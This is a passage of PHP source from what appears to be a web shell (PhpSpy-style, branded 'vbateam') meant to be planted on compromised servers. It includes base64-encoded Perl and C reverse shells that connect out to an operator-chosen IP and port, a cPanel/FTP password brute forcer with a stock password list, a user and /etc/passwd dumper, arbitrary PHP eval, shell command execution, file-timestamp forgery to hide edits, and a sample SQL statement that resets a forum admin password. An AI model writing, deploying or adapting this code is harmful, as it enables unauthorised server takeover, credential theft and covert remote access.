775 $dbform .= "<input type=\"hidden\" id=\"dbuser\" name=\"dbuser\" value=\"$dbuser\" />\n";
776 }
777 if(isset($dbpass)) {
778 $dbform .= "<input type=\"hidden\" id=\"dbpass\" name=\"dbpass\" value=\"$dbpass\" />\n";
779 }
780 if(isset($dbport)) {
781 $dbform .= "<input type=\"hidden\" id=\"dbport\" name=\"dbport\" value=\"$dbport\" />\n";
782 }
783 if(isset($dbname)) {
784 $dbform .= "<input type=\"hidden\" id=\"dbname\" name=\"dbname\" value=\"$dbname\" />\n";
785 }
786 if(isset($charset)) {
787 $dbform .= "<input type=\"hidden\" id=\"charset\" name=\"charset\" value=\"$charset\" />\n";
788 }
789
790 if ($doing == 'backupmysql' && $saveasfile) {
791 if (!$table) {
792 m('Please choose the table');
793 } else {
794 dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
795 $table = array_flip($table);
796 $fp = @fopen($path,'w');
797 if ($fp) {
798 $result = q('SHOW tables');
799 if (!$result) p('<h2>'.mysql_error().'</h2>');
800 $mysqldata = '';
801 while ($currow = mysql_fetch_array($result)) {
802 if (isset($table[$currow[0]])) {
803 sqldumptable($currow[0], $fp);
804 }
805 }
806 fclose($fp);
807 $fileurl = str_replace(SA_ROOT,'',$path);
808 m('Database has success backup to <a href="'.$fileurl.'" target="_blank">'.$path.'</a>');
809 mysql_close();
810 } else {
811 m('Backup failed');
812 }
813 }
814 }
815 if ($insert && $insertsql) {
816 $keystr = $valstr = $tmp = '';
817 foreach($insertsql as $key => $val) {
818 if ($val) {
819 $keystr .= $tmp.$key;
820 $valstr .= $tmp."'".addslashes($val)."'";
821 $tmp = ',';
822 }
823 }
824 if ($keystr && $valstr) {
825 dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
826 m(q("INSERT INTO $tablename ($keystr) VALUES ($valstr)") ? 'Insert new record of success' : mysql_error());
827 }
828 }
829 if ($update && $insertsql && $base64) {
830 $valstr = $tmp = '';
831 foreach($insertsql as $key => $val) {
832 $valstr .= $tmp.$key."='".addslashes($val)."'";
833 $tmp = ',';
834 }
835 if ($valstr) {
836 $where = base64_decode($base64);
837 dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
838 m(q("UPDATE $tablename SET $valstr WHERE $where LIMIT 1") ? 'Record updating' : mysql_error());
839 }
840 }
841 if ($doing == 'del' && $base64) {
842 $where = base64_decode($base64);
843 $delete_sql = "DELETE FROM $tablename WHERE $where";
844 dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
845 m(q("DELETE FROM $tablename WHERE $where") ? 'Deletion record of success' : mysql_error());
846 }
847
848 if ($tablename && $doing == 'drop') {
849 dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
850 if (q("DROP TABLE $tablename")) {
851 m('Drop table of success');
852 $tablename = '';
853 } else {
854 m(mysql_error());
855 }
856 }
857
858 $charsets = array(''=>'Default','gbk'=>'GBK', 'big5'=>'Big5', 'utf8'=>'UTF-8', 'latin1'=>'Latin1');
859
860 formhead(array('title'=>'MYSQL Manager'));
861 makehide('action','sqladmin');
862 p('<p>');
863 p('DBHost:');
864 makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost));
865 p(':');
866 makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport));
867 p('DBUser:');
868 makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser));
869 p('DBPass:');
870 makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass));
871 p('DBCharset:');
872 makeselect(array('name'=>'charset','option'=>$charsets,'selected'=>$charset));
873 makeinput(array('name'=>'connect','value'=>'Connect','type'=>'submit','class'=>'bt'));
874 p('</p>');
875 formfoot();
876?>
877<script type="text/javascript">
878function editrecord(action, base64, tablename){
879 if (action == 'del') {
880 if (!confirm('Is or isn\'t deletion record?')) return;
881 }
882 $('recordlist').doing.value=action;
883 $('recordlist').base64.value=base64;
884 $('recordlist').tablename.value=tablename;
885 $('recordlist').submit();
886}
887function moddbname(dbname) {
888 if(!dbname) return;
889 $('setdbname').dbname.value=dbname;
890 $('setdbname').submit();
891}
892function settable(tablename,doing,page) {
893 if(!tablename) return;
894 if (doing) {
895 $('settable').doing.value=doing;
896 }
897 if (page) {
898 $('settable').page.value=page;
899 }
900 $('settable').tablename.value=tablename;
901 $('settable').submit();
902}
903</script>
904<?php
905 // SQL
906 formhead(array('name'=>'recordlist'));
907 makehide('doing');
908 makehide('action','sqladmin');
909 makehide('base64');
910 makehide('tablename');
911 p($dbform);
912 formfoot();
913
914 // Data
915 formhead(array('name'=>'setdbname'));
916 makehide('action','sqladmin');
917 p($dbform);
918 if (!$dbname) {
919 makehide('dbname');
920 }
921 formfoot();
922
923
924 formhead(array('name'=>'settable'));
925 makehide('action','sqladmin');
926 p($dbform);
927 makehide('tablename');
928 makehide('page',$page);
929 makehide('doing');
930 formfoot();
931
932 $cachetables = array();
933 $pagenum = 30;
934 $page = intval($page);
935 if($page) {
936 $start_limit = ($page - 1) * $pagenum;
937 } else {
938 $start_limit = 0;
939 $page = 1;
940 }
941 if (isset($dbhost) && isset($dbuser) && isset($dbpass) && isset($connect)) {
942 dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
943 // get mysql server
944 $mysqlver = mysql_get_server_info();
945 p('<p>MySQL '.$mysqlver.' running in '.$dbhost.' as '.$dbuser.'@'.$dbhost.'</p>');
946 $highver = $mysqlver > '4.1' ? 1 : 0;
947
948 // Show database
949 $query = q("SHOW DATABASES");
950 $dbs = array();
951 $dbs[] = '-- Select a database --';
952 while($db = mysql_fetch_array($query)) {
953 $dbs[$db['Database']] = $db['Database'];
954 }
955 makeselect(array('title'=>'Please select a database:','name'=>'db[]','option'=>$dbs,'selected'=>$dbname,'onchange'=>'moddbname(this.options[this.selectedIndex].value)','newline'=>1));
956 $tabledb = array();
957 if ($dbname) {
958 p('<p>');
959 p('Current dababase: <a href="javascript:moddbname(\''.$dbname.'\');">'.$dbname.'</a>');
960 if ($tablename) {
961 p(' | Current Table: <a href="javascript:settable(\''.$tablename.'\');">'.$tablename.'</a> [ <a href="javascript:settable(\''.$tablename.'\', \'insert\');">Insert</a> | <a href="javascript:settable(\''.$tablename.'\', \'structure\');">Structure</a> | <a href="javascript:settable(\''.$tablename.'\', \'drop\');">Drop</a> ]');
962 }
963 p('</p>');
964 mysql_select_db($dbname);
965
966 $getnumsql = '';
967 $runquery = 0;
968 if ($sql_query) {
969 $runquery = 1;
970 }
971 $allowedit = 0;
972 if ($tablename && !$sql_query) {
973 $sql_query = "SELECT * FROM $tablename";
974 $getnumsql = $sql_query;
975 $sql_query = $sql_query." LIMIT $start_limit, $pagenum";
976 $allowedit = 1;
977 }
978 p('<form action="'.$self.'" method="POST">');
979 p('<p><table width="200" border="0" cellpadding="0" cellspacing="0"><tr><td colspan="2">Run SQL query/queries on database <font color=red><b>'.$dbname.'</font></b>:<BR>Example VBB Password: <font color=red>vbateam</font><BR><font color=yellow>UPDATE `user` SET `password` = \'69e53e5ab9536e55d31ff533aefc4fbe\', salt = \'p5T\' WHERE `userid` = \'1\' </font>
980 </td></tr><tr><td><textarea name="sql_query" class="area" style="width:600px;height:50px;overflow:auto;">'.htmlspecialchars($sql_query,ENT_QUOTES).'</textarea></td><td style="padding:0 5px;"><input class="bt" style="height:50px;" name="submit" type="submit" value="Query" /></td></tr></table></p>');
981 makehide('tablename', $tablename);
982 makehide('action','sqladmin');
983 p($dbform);
984 p('</form>');
985 if ($tablename || ($runquery && $sql_query)) {
986 if ($doing == 'structure') {
987 $result = q("SHOW COLUMNS FROM $tablename");
988 $rowdb = array();
989 while($row = mysql_fetch_array($result)) {
990 $rowdb[] = $row;
991 }
992 p('<table border="0" cellpadding="3" cellspacing="0">');
993 p('<tr class="head">');
994 p('<td>Field</td>');
995 p('<td>Type</td>');
996 p('<td>Null</td>');
997 p('<td>Key</td>');
998 p('<td>Default</td>');
999 p('<td>Extra</td>');
1000 p('</tr>');
1001 foreach ($rowdb as $row) {
1002 $thisbg = bg();
1003 p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
1004 p('<td>'.$row['Field'].'</td>');
1005 p('<td>'.$row['Type'].'</td>');
1006 p('<td>'.$row['Null'].' </td>');
1007 p('<td>'.$row['Key'].' </td>');
1008 p('<td>'.$row['Default'].' </td>');
1009 p('<td>'.$row['Extra'].' </td>');
1010 p('</tr>');
1011 }
1012 tbfoot();
1013 } elseif ($doing == 'insert' || $doing == 'edit') {
1014 $result = q('SHOW COLUMNS FROM '.$tablename);
1015 while ($row = mysql_fetch_array($result)) {
1016 $rowdb[] = $row;
1017 }
1018 $rs = array();
1019 if ($doing == 'insert') {
1020 p('<h2>Insert new line in '.$tablename.' table »</h2>');
1021 } else {
1022 p('<h2>Update record in '.$tablename.' table »</h2>');
1023 $where = base64_decode($base64);
1024 $result = q("SELECT * FROM $tablename WHERE $where LIMIT 1");
1025 $rs = mysql_fetch_array($result);
1026 }
1027 p('<form method="post" action="'.$self.'">');
1028 p($dbform);
1029 makehide('action','sqladmin');
1030 makehide('tablename',$tablename);
1031 p('<table border="0" cellpadding="3" cellspacing="0">');
1032 foreach ($rowdb as $row) {
1033 if ($rs[$row['Field']]) {
1034 $value = htmlspecialchars($rs[$row['Field']]);
1035 } else {
1036 $value = '';
1037 }
1038 $thisbg = bg();
1039 p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
1040 p('<td><b>'.$row['Field'].'</b><br />'.$row['Type'].'</td><td><textarea class="area" name="insertsql['.$row['Field'].']" style="width:500px;height:60px;overflow:auto;">'.$value.'</textarea></td></tr>');
1041 }
1042 if ($doing == 'insert') {
1043 p('<tr class="fout"><td colspan="2"><input class="bt" type="submit" name="insert" value="Insert" /></td></tr>');
1044 } else {
1045 p('<tr class="fout"><td colspan="2"><input class="bt" type="submit" name="update" value="Update" /></td></tr>');
1046 makehide('base64', $base64);
1047 }
1048 p('</table></form>');
1049 } else {
1050 $querys = @explode(';',$sql_query);
1051 foreach($querys as $num=>$query) {
1052 if ($query) {
1053 p("<p><b>Query#{$num} : ".htmlspecialchars($query,ENT_QUOTES)."</b></p>");
1054 switch(qy($query))
1055 {
1056 case 0:
1057 p('<h2>Error : '.mysql_error().'</h2>');
1058 break;
1059 case 1:
1060 if (strtolower(substr($query,0,13)) == 'select * from') {
1061 $allowedit = 1;
1062 }
1063 if ($getnumsql) {
1064 $tatol = mysql_num_rows(q($getnumsql));
1065 $multipage = multi($tatol, $pagenum, $page, $tablename);
1066 }
1067 if (!$tablename) {
1068 $sql_line = str_replace(array("\r", "\n", "\t"), array(' ', ' ', ' '), trim(htmlspecialchars($query)));
1069 $sql_line = preg_replace("/\/\*[^(\*\/)]*\*\//i", " ", $sql_line);
1070 preg_match_all("/from\s+`{0,1}([\w]+)`{0,1}\s+/i",$sql_line,$matches);
1071 $tablename = $matches[1][0];
1072 }
1073 $result = q($query);
1074 p($multipage);
1075 p('<table border="0" cellpadding="3" cellspacing="0">');
1076 p('<tr class="head">');
1077 if ($allowedit) p('<td>Action</td>');
1078 $fieldnum = @mysql_num_fields($result);
1079 for($i=0;$i<$fieldnum;$i++){
1080 $name = @mysql_field_name($result, $i);
1081 $type = @mysql_field_type($result, $i);
1082 $len = @mysql_field_len($result, $i);
1083 p("<td nowrap>$name<br><span>$type($len)</span></td>");
1084 }
1085 p('</tr>');
1086 while($mn = @mysql_fetch_assoc($result)){
1087 $thisbg = bg();
1088 p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
1089 $where = $tmp = $b1 = '';
1090 foreach($mn as $key=>$inside){
1091 if ($inside) {
1092 $where .= $tmp.$key."='".addslashes($inside)."'";
1093 $tmp = ' AND ';
1094 }
1095 $b1 .= '<td nowrap>'.html_clean($inside).' </td>';
1096 }
1097 $where = base64_encode($where);
1098 if ($allowedit) p('<td nowrap><a href="javascript:editrecord(\'edit\', \''.$where.'\', \''.$tablename.'\');">Edit</a> | <a href="javascript:editrecord(\'del\', \''.$where.'\', \''.$tablename.'\');">Del</a></td>');
1099 p($b1);
1100 p('</tr>');
1101 unset($b1);
1102 }
1103 tbfoot();
1104 p($multipage);
1105 break;
1106 case 2:
1107 $ar = mysql_affected_rows();
1108 p('<h2>affected rows : <b>'.$ar.'</b></h2>');
1109 break;
1110 }
1111 }
1112 }
1113 }
1114 } else {
1115 $query = q("SHOW TABLE STATUS");
1116 $table_num = $table_rows = $data_size = 0;
1117 $tabledb = array();
1118 while($table = mysql_fetch_array($query)) {
1119 $data_size = $data_size + $table['Data_length'];
1120 $table_rows = $table_rows + $table['Rows'];
1121 $table['Data_length'] = sizecount($table['Data_length']);
1122 $table_num++;
1123 $tabledb[] = $table;
1124 }
1125 $data_size = sizecount($data_size);
1126 unset($table);
1127 p('<table border="0" cellpadding="0" cellspacing="0">');
1128 p('<form action="'.$self.'" method="POST">');
1129 makehide('action','sqladmin');
1130 p($dbform);
1131 p('<tr class="head">');
1132 p('<td width="2%" align="center"><input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form)" /></td>');
1133 p('<td>Name</td>');
1134 p('<td>Rows</td>');
1135 p('<td>Data_length</td>');
1136 p('<td>Create_time</td>');
1137 p('<td>Update_time</td>');
1138 if ($highver) {
1139 p('<td>Engine</td>');
1140 p('<td>Collation</td>');
1141 }
1142 p('</tr>');
1143 foreach ($tabledb as $key => $table) {
1144 $thisbg = bg();
1145 p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
1146 p('<td align="center" width="2%"><input type="checkbox" name="table[]" value="'.$table['Name'].'" /></td>');
1147 p('<td><a href="javascript:settable(\''.$table['Name'].'\');">'.$table['Name'].'</a> [ <a href="javascript:settable(\''.$table['Name'].'\', \'insert\');">Insert</a> | <a href="javascript:settable(\''.$table['Name'].'\', \'structure\');">Structure</a> | <a href="javascript:settable(\''.$table['Name'].'\', \'drop\');">Drop</a> ]</td>');
1148 p('<td>'.$table['Rows'].'</td>');
1149 p('<td>'.$table['Data_length'].'</td>');
1150 p('<td>'.$table['Create_time'].'</td>');
1151 p('<td>'.$table['Update_time'].'</td>');
1152 if ($highver) {
1153 p('<td>'.$table['Engine'].'</td>');
1154 p('<td>'.$table['Collation'].'</td>');
1155 }
1156 p('</tr>');
1157 }
1158 p('<tr class=fout>');
1159 p('<td> </td>');
1160 p('<td>Total tables: '.$table_num.'</td>');
1161 p('<td>'.$table_rows.'</td>');
1162 p('<td>'.$data_size.'</td>');
1163 p('<td colspan="'.($highver ? 4 : 2).'"> </td>');
1164 p('</tr>');
1165
1166 p("<tr class=\"fout\"><td colspan=\"".($highver ? 8 : 6)."\"><input name=\"saveasfile\" value=\"1\" type=\"checkbox\" /> Save as file <input class=\"input\" name=\"path\" value=\"".SA_ROOT.$_SERVER['HTTP_HOST']."_MySQL.sql\" type=\"text\" size=\"60\" /> <input class=\"bt\" type=\"submit\" name=\"downrar\" value=\"Export selection table\" /></td></tr>");
1167 makehide('doing','backupmysql');
1168 formfoot();
1169 p("</table>");
1170 fr($query);
1171 }
1172 }
1173 }
1174 tbfoot();
1175 @mysql_close();
1176}//end sql backup
1177
1178
1179elseif ($action == 'backconnect') {
1180 !$yourip && $yourip = $_SERVER['REMOTE_ADDR'];
1181 !$yourport && $yourport = '12345';
1182 $usedb = array('perl'=>'perl','c'=>'c');
1183
1184 $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".
1185 "aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".
1186 "hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".
1187 "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".
1188 "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".
1189 "KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".
1190 "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
1191 $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC".
1192 "BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb".
1193 "SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd".
1194 "KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ".
1195 "sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC".
1196 "Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D".
1197 "QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp".
1198 "Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
1199
1200 if ($start && $yourip && $yourport && $use){
1201 if ($use == 'perl') {
1202 cf('/tmp/angel_bc',$back_connect);
1203 $res = execute(which('perl')." /tmp/angel_bc $yourip $yourport &");
1204 } else {
1205 cf('/tmp/angel_bc.c',$back_connect_c);
1206 $res = execute('gcc -o /tmp/angel_bc /tmp/angel_bc.c');
1207 @unlink('/tmp/angel_bc.c');
1208 $res = execute("/tmp/angel_bc $yourip $yourport &");
1209 }
1210 m("Now script try connect to $yourip port $yourport ...");
1211 }
1212
1213 formhead(array('title'=>'Back Connect'));
1214 makehide('action','backconnect');
1215 p('<p>');
1216 p('Your IP:');
1217 makeinput(array('name'=>'yourip','size'=>20,'value'=>$yourip));
1218 p('Your Port:');
1219 makeinput(array('name'=>'yourport','size'=>15,'value'=>$yourport));
1220 p('Use:');
1221 makeselect(array('name'=>'use','option'=>$usedb,'selected'=>$use));
1222 makeinput(array('name'=>'start','value'=>'Start','type'=>'submit','class'=>'bt'));
1223 p('</p>');
1224 formfoot();
1225}//end backconnect window via NC
1226
1227// Brute
1228elseif ($action == 'brute') {
1229formhead(array('title'=>'Brute Forcer'));
1230 makehide('action','brute');
1231 makehide('dir',$brute);
1232@ini_set('memory_limit', 1000000000000);
1233$connect_timeout=5;
1234@set_time_limit(0);
1235$submit = $_REQUEST['submit'];
1236$users = $_REQUEST['users'];
1237$pass = $_REQUEST['passwords'];
1238$target = $_REQUEST['target'];
1239$option = $_REQUEST['option'];
1240
1241
1242$passlist = "0123456
124301234567
1244012345678
12450123456789
124601234567890
1247123456
12481234567
124912345678
1250123456789
12511234567890
1252111111
1253000000
1254222222
1255333333
1256444444
1257555555
1258666666
1259777777
1260888888
1261999999
1262123123
1263456456
1264789789
1265123321
1266456654
1267654321
12687654321
126987654321
1270987654321
12710987654321
1272admin
1273administrator
1274admincp
1275cpanel
1276adminx
1277admins
1278password
1279passwords
1280passw0rd
1281p@ssw0rd
1282p@ssword
1283khongco
128425251325
1285passw0rds";
1286if($target == ''){
1287$target = 'localhost';
1288}
1289print " <div align='center'>
1290<form method='post' style='border: 1px solid #000000'><br><br>
1291<TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#966117 cellPadding=5 width='40%' bgColor=#303030 borderColorLight=#966117 border=1><tr><td>
1292<b> Target : </font><input type='text' name='target' size='16' value= $target style='border: font-family:tahoma; font-weight:bold;'></p></font></b></p>
1293<div align='center'><br>
1294<TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#966117 cellPadding=5 width='50%' bgColor=#303030 borderColorLight=#966117 border=1>
1295<tr>
1296<td align='center'>
1297<b>Username</b></td>
1298<td>
1299<p align='center'>
1300<b>Password</b></td>
1301</tr>
1302</table>
1303<p align='center'>
1304<textarea rows='20' name='users' cols='25' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0'>";
1305$i = 0;
1306while ($i < 60000) {
1307
1308 $line = posix_getpwuid($i);
1309 if (!empty($line)) {
1310
1311 while (list ($key, $vba_etcpwd) = each($line)){
1312 echo "".$vba_etcpwd."\n";
1313 break;
1314 }
1315
1316 }
1317
1318 $i++;
1319}
1320echo "
1321</textarea>
1322<textarea rows='20' name='passwords' cols='25' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0'>$passlist</textarea><br>
1323<br>
1324<b>Options : </span><input name='option' value='cpanel' style='font-weight: 700;' checked type='radio'> cPanel
1325<input name='option' value='ftp' style='font-weight: 700;' type='radio'> ftp ==> <input type='submit' value='Attack' name='submit' ></p>
1326</td></tr></table></td></tr></form><p align= 'left'>";
1327?>
1328<?php
1329function ftp_check($host,$user,$pass,$timeout){
1330$ch = curl_init();
1331curl_setopt($ch, CURLOPT_URL, "ftp://$host");
1332curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1333curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
1334curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);
1335curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
1336curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
1337curl_setopt($ch, CURLOPT_FAILONERROR, 1);
1338$data = curl_exec($ch);
1339if ( curl_errno($ch) == 28 ) {
1340
1341print "<b> Error : Connection timed out , make confidence about validation of target !</b>";
1342exit;}
1343
1344elseif ( curl_errno($ch) == 0 ){
1345
1346p("<b>[ attack@vbateam.net ]# </b>
1347<b> Attacking has been done! Username: <font color='#FF0000'> $user </font> / Password:<font color='#FF0000'> $pass </font> => <a href=http://$user:$pass@$host:2082 target=_blank>Login</a></b><br>");
1348}
1349curl_close($ch);}
1350
1351function cpanel_check($host,$user,$pass,$timeout){
1352$ch = curl_init();
1353curl_setopt($ch, CURLOPT_URL, "http://$host:2082");
1354curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1355curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
1356curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
1357curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
1358curl_setopt($ch, CURLOPT_FAILONERROR, 1);
1359$data = curl_exec($ch);
1360if ( curl_errno($ch) == 28 ) {
1361print "<b> Error : Connection timed out , make confidence about validation of target !</b>";
1362exit;}
1363elseif ( curl_errno($ch) == 0 ){
1364
1365p("<b>[ attack@vbateam.net ]# </b><b>Attacking has been done!</a> Username: <font color='#FF0000'> $user </font> / Password:<font color='#FF0000'> $pass </font></b><br>");}curl_close($ch);}
1366
1367if(isset($submit) && !empty($submit)){
1368
1369$userlist = explode ("\n" , $users );
1370$passlist = explode ("\n" , $pass );
1371p('<b>[ attack@vbateam.net ]# Attacking ...</font></b><br>');
1372foreach ($userlist as $user) {
1373$_user = trim($user);
1374foreach ($passlist as $password ) {
1375$_pass = trim($password);
1376if($option == "ftp"){
1377ftp_check($target,$_user,$_pass,$connect_timeout);
1378}
1379if ($option == "cpanel")
1380{
1381cpanel_check($target,$_user,$_pass,$connect_timeout);
1382}
1383}
1384}
1385}
1386
1387 formfoot();
1388}
1389
1390
1391
1392
1393
1394
1395elseif ($action == 'etcpwd') {
1396formhead(array('title'=>'Get /etc/passwd'));
1397 makehide('action','etcpwd');
1398 makehide('dir',$nowpath);
1399$i = 0;
1400 echo "<p><br><textarea class=\"area\" id=\"phpcodexxx\" name=\"phpcodexxx\" cols=\"100\" rows=\"25\">";
1401while ($i < 60000) {
1402
1403 $line = posix_getpwuid($i);
1404 if (!empty($line)) {
1405
1406 while (list ($key, $vba_etcpwd) = each($line)){
1407 echo "".$vba_etcpwd."\n";
1408 break;
1409 }
1410
1411 }
1412
1413 $i++;
1414}
1415 echo "</textarea></p>";
1416 formfoot();
1417}
1418
1419elseif ($action == 'eval') {
1420 $phpcode = trim($phpcode);
1421 if($phpcode){
1422 if (!preg_match('#<\?#si', $phpcode)) {
1423 $phpcode = "<?php\n\n{$phpcode}\n\n?>";
1424 }
1425 eval("?".">$phpcode<?");
1426 }
1427 formhead(array('title'=>'Eval PHP Code'));
1428 makehide('action','eval');
1429 maketext(array('title'=>'PHP Code','name'=>'phpcode', 'value'=>$phpcode));
1430 p('<p><a href="http://www.4ngel.net/phpspy/plugin/" target="_blank">Get plugins</a></p>');
1431 formfooter();
1432}//end eval
1433
1434elseif ($action == 'editfile') {
1435 if(file_exists($opfile)) {
1436 $fp=@fopen($opfile,'r');
1437 $contents=@fread($fp, filesize($opfile));
1438 @fclose($fp);
1439 $contents=htmlspecialchars($contents);
1440 }
1441 formhead(array('title'=>'Create / Edit File'));
1442 makehide('action','file');
1443 makehide('dir',$nowpath);
1444 makeinput(array('title'=>'Current File (import new file name and new file)','name'=>'editfilename','value'=>$opfile,'newline'=>1));
1445 maketext(array('title'=>'File Content','name'=>'filecontent','value'=>$contents));
1446 formfooter();
1447}//end editfile
1448
1449elseif ($action == 'newtime') {
1450 $opfilemtime = @filemtime($opfile);
1451 //$time = strtotime("$year-$month-$day $hour:$minute:$second");
1452 $cachemonth = array('January'=>1,'February'=>2,'March'=>3,'April'=>4,'May'=>5,'June'=>6,'July'=>7,'August'=>8,'September'=>9,'October'=>10,'November'=>11,'December'=>12);
1453 formhead(array('title'=>'Clone file was last modified time'));
1454 makehide('action','file');
1455 makehide('dir',$nowpath);
1456 makeinput(array('title'=>'Alter file','name'=>'curfile','value'=>$opfile,'size'=>120,'newline'=>1));
1457 makeinput(array('title'=>'Reference file (fullpath)','name'=>'tarfile','size'=>120,'newline'=>1));
1458 formfooter();
1459 formhead(array('title'=>'Set last modified'));
1460 makehide('action','file');
1461 makehide('dir',$nowpath);
1462 makeinput(array('title'=>'Current file (fullpath)','name'=>'curfile','value'=>$opfile,'size'=>120,'newline'=>1));
1463 p('<p>Instead »');
1464 p('year:');
1465 makeinput(array('name'=>'year','value'=>date('Y',$opfilemtime),'size'=>4));
1466 p('month:');
1467 makeinput(array('name'=>'month','value'=>date('m',$opfilemtime),'size'=>2));
1468 p('day:');
1469 makeinput(array('name'=>'day','value'=>date('d',$opfilemtime),'size'=>2));
1470 p('hour:');
1471 makeinput(array('name'=>'hour','value'=>date('H',$opfilemtime),'size'=>2));
1472 p('minute:');
1473 makeinput(array('name'=>'minute','value'=>date('i',$opfilemtime),'size'=>2));
1474 p('second:');
1475 makeinput(array('name'=>'second','value'=>date('s',$opfilemtime),'size'=>2));
1476 p('</p>');
1477 formfooter();
1478}//end newtime
1479
1480elseif ($action == 'shell') {
1481 if (IS_WIN && IS_COM) {
1482 if($program && $parameter) {
1483 $shell= new COM('Shell.Application');
1484 $a = $shell->ShellExecute($program,$parameter);
1485 m('Program run has '.(!$a ? 'success' : 'fail'));
1486 }
1487 !$program && $program = 'c:\windows\system32\cmd.exe';
1488 !$parameter && $parameter = '/c net start > '.SA_ROOT.'log.txt';
1489 formhead(array('title'=>'Execute Program'));
1490 makehide('action','shell');
1491 makeinput(array('title'=>'Program','name'=>'program','value'=>$program,'newline'=>1));
1492 p('<p>');
1493 makeinput(array('title'=>'Parameter','name'=>'parameter','value'=>$parameter));
1494 makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute'));
1495 p('</p>');
1496 formfoot();
1497 }
1498 formhead(array('title'=>'Execute Command'));
1499 makehide('action','shell');
1500 if (IS_WIN && IS_COM) {
1501 $execfuncdb = array('phpfunc'=>'phpfunc','wscript'=>'wscript','proc_open'=>'proc_open');
1502 makeselect(array('title'=>'Use:','name'=>'execfunc','option'=>$execfuncdb,'selected'=>$execfunc,'newline'=>1));
1503 }
1504 p('<p>');
1505 makeinput(array('title'=>'Command','name'=>'command','value'=>$command));
1506 makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute'));
1507 p('</p>');
1508 formfoot();
1509
1510 if ($command) {
1511 p('<hr width="100%" noshade /><pre>');
1512 if ($execfunc=='wscript' && IS_WIN && IS_COM) {
1513 $wsh = new COM('WScript.shell');
1514 $exec = $wsh->exec('cmd.exe /c '.$command);
